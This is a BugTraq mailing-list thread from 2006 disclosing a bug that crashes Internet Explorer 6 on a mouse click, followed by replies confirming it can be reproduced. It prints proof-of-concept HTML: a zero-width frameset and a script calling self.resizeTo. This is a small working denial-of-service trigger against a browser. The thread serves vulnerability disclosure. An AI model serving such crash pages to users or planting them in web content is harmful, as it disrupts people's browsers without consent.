BugTraq
RE: Microsoft Internet Explorer - Crash on mouse button click May 23 2006 07:19PM
Jain, Siddhartha (Siddhartha Jain kla-tencor com)
Sorry, the bug is perfectly reproducible. I skipped clicking the mouse
after loading the page.

- Siddhartha

-----Original Message-----
From: Jain, Siddhartha
Sent: Tuesday, May 23, 2006 12:18 PM
To: 'mac68k (at) gmail (dot) com [email concealed]'; bugtraq (at) securityfocus (dot) com [email concealed]
Subject: RE: Microsoft Internet Explorer - Crash on mouse button click

Worked only once on my PC.
Windows XP SP2 with IE 6.0.2900

Re-visiting the PoC page doesn't reproduce the crash.

- Siddhartha

-----Original Message-----
From: mac68k (at) gmail (dot) com [email concealed] [mailto:mac68k (at) gmail (dot) com [email concealed]]
Sent: Saturday, May 20, 2006 6:24 AM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Microsoft Internet Explorer - Crash on mouse button click

Title:

Microsoft Internet Explorer - Crash on mouse button click

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Both

Date of discovery:

2003/12/28

Release date:

2006/05/20

Affected software:

Microsoft Internet Explorer

Description:

There is a bug in Microsoft Internet Explorer, which causes a crash on
mouse button click.

PoC exploit code:

1) exploit_1.html

<frameset cols="0%, *">

<frame src="exploit_2.html">

</frameset>

2) exploit_2.html

<SCRIPT>

self.resizeTo(2003, 1228);

</SCRIPT>

PoC exploit sample:

http://www.kil13r.info/iebug/exploit_1.html

PoC exploit screenshot:

http://www.kil13r.info/iebug/screenshot.jpg

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus